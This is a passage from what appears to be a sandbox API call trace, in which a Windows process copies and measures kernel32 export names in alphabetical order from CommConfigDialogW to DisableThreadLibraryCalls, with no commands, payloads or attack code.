| out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.623] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.623] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.623] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.623] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.623] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.623] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.623] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.623] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.624] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.624] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.624] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.624] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.624] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.624] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.624] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.624] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.624] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.624] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.624] lstrlenA (lpString="COPYFILEA") returned 9 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.624] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.624] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.624] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.624] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.624] lstrlenA (lpString="COPYFILEW") returned 9 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.624] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.624] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.624] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.625] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.625] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.625] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.625] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.625] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.625] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.625] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.625] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.625] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.625] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.625] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.625] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.625] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.625] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.625] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.625] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.625] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.625] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.626] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.626] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.626] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.626] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.626] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.626] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.626] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.626] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.626] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.626] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.626] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.626] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.626] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.626] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.626] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.626] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.626] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.626] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.626] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.627] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.627] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.627] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.627] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.627] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.627] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.627] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.627] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.627] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.627] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.627] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.627] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.627] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.627] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.627] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.627] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.627] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.627] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.627] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.628] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.628] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.628] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.628] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.628] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.628] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.628] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.628] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.628] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.628] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.628] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.628] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.628] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.628] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.628] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.628] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.628] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.628] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.628] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.629] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.629] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.629] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.629] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.629] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.629] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.629] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.629] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.629] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.629] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.629] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.629] lstrlenA (lpString="DELETEATOM") returned 10 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.629] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.629] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.629] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.629] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.629] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.629] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.630] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.630] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.630] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.630] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.630] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.630] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.630] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.630] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.630] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.630] 